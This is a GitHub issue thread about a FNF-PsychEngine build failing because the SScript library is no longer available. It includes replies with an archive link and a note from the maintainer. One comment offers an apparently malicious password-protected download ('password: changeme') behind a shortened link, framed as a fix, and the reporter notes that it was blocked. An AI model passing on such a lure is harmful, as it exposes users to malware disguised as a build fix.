### ISSUE TITLE
When Building, says "SScript is not available, thanks to everyone for their support."

### ISSUE THREAD

**Issue by Soeiz** [ShadowMario/FNF-PsychEngine#15430]
### Describe your bug here.

Latly, I've changed PC and wanted to re-install everything. But when I try to compile, it takes 10 whole minutes and then it launches an error. It seems very weird because I did installed SScript with haxelib. 

Maybe I've not installed something properly, since the tutorial is from 3 years ago (https://gamebanana.com/tuts/13935)

### Command Prompt/Terminal logs (if existing)

```bash
C:/HaxeToolkit/haxe/lib/SScript/21,0,0/src/macro/Macro.hx:10: characters 96-100 : SScript is not available, thanks to everyone for their support.
```

### Are you modding a build from source or with Lua?

Source

### What is your build target?

Windows

### Did you edit anything in this build? If so, mention or summarize your changes.

No

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Soeiz** [comment]
Yeah no, your link is weird (it has been blocked)

**Comment by CrusherNotDrip** [comment]
https://github.com/CobaltBar/SScript-Archive?tab=readme-ov-file#install-manually

**Comment by KernelTech11** [comment]
uh ohhhh o think sscript is not available anymore

**Comment by KernelTech11** [comment]
> uh ohhhh i think sscript is not available anymore for Psych engine

try using a much more recent tutorial on how to compile the source code of psych

**Comment by ShadowMario** [comment]
This will be fixed once I merge the Experimental branch into Main (1.0 release)
